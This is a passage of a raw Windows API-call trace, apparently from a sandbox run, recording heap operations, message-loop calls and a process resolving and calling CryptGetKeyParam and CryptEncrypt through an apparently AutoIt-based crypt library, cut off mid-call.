PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0119.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0119.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0119.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0119.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0119.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0119.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0119.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0119.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0119.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0119.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0119.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0119.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392030 [0119.951] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0119.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392030 | out: hHeap=0x1780000) returned 1 [0119.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0119.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca850 [0119.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0119.951] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0119.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0119.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0119.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0119.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0119.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0119.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0119.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0119.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0119.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0119.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0119.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0119.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0119.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0119.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0119.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0119.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0119.951] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0119.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0119.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0119.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0119.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0119.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0119.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0119.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0119.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0119.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0119.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0119.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0119.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0119.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0119.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0119.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0119.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0119.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0119.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0119.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0119.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0119.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0119.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0119.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0119.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0119.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0119.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0119.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0119.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0119.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0119.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0119.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0119.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0119.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0119.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0119.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f48 [0119.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e27e8 [0119.975] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0119.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0119.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0119.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0119.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0119.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0119.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0119.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0119.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0119.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0119.975] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0119.975] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0119.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0119.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0119.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0119.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0119.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0119.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0119.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0119.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0119.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0119.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0119.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0119.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0119.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0119.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0119.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0119.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0119.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0119.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0119.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0119.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0119.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0119.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0119.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0119.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0119.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0119.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796e88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0119.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0119.976] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0119.977] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0119.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0119.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0119.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0119.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0119.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0119.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0119.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0119.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0119.977] CryptGetKeyParam (in: hKey=0x41ac140, dwParam=0x7, pbData=0x43e2850, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2850*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0119.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0119.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0119.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0119.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0119.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0119.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0119.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0119.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0119.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0119.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0119.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0119.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0119.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0119.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0119.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0119.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0119.977] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0119.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0119.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0119.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0119.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0119.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0119.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0119.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0119.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0119.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0119.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0119.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0119.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0119.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0119.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0119.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0119.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0119.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0119.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0119.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0119.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0119.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0119.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0119.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0119.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0119.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0119.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0119.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0119.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0119.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0119.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0119.978] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0119.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0119.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0119.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0119.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0119.979] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 1 [0119.979] TranslateMessage (lpMsg=0x144e894) returned 0 [0119.979] DispatchMessageW (lpMsg=0x144e894) returned 0x0 [0119.979] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0119.979] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0119.979] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0119.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0119.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea268 | out: hHeap=0x1780000) returned 1 [0119.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0119.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0119.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0119.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0119.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9128 | out: hHeap=0x1780000) returned 1 [0119.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0119.979] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0119.979] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0119.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0119.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0119.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0119.980] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0119.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0119.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0119.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0119.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0119.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0119.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0119.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0119.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0119.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0119.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0119.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0119.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0119.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0119.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0119.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0119.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0119.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0119.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0119.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0119.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0119.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0119.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0119.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0119.980] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0119.980] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0119.980] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0119.981] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0119.981] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0119.981] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0119.981] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0119.981] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cad00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0119.981] CryptEncrypt (in: hKey=0x41ac140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x50c5, 